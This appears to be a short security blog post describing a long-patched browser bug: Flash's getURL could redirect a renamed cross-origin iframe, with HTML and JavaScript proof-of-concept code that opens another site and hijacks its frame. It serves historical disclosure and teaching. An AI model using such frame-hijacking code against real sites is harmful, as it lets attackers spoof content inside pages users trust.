Flash getURL Cross-Origin Sub-Frame Navigation

Flash’s getURL method can navigate frames by name, including frames that belong to other domains. By assigning a name to a cross-origin iframe through JavaScript (which was apparently allowed at the time) and then using Flash’s getURL with that name as the target, the attacker can redirect a frame inside a different-origin window to an arbitrary URL.

<object id="oFlash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
        codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"
        width="10" height="10">
    <param name="allowScriptAccess" value="Always" />
    <param name="movie" value="NOTHING_LOADED_YET" />
</object>

<script language="JavaScript">
var newWindow;
function openWindow()
{
    newWindow = window.open("http://www.nature.com");
    alert("Now click on the Hijack button");
}

function hijackIframe()
{
    var strIframeName = "HIJACKED_IFRAME";

    // Naming a cross-origin iframe — apparently legal/allowed
    newWindow[0].name = strIframeName;

    // getURL with the iframe name as target navigates it cross-origin
    oFlash.movie = "geturl.swf?METHOD=get&TARGET=" + strIframeName + "&REDIR=hijacked_iframe.html";
}
</script>

The expected behavior would be for the Flash navigation to open a new window instead of redirecting the cross-origin iframe, since the iframe doesn’t belong to the attacker’s domain. The combination of allowing cross-origin iframe naming with Flash’s unrestricted getURL targeting created a bypass.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE8 DoS — XAML insertObject Crash] :: [Silverlight 3 DoS — SplashScreenSource Null Pointer Dereference] >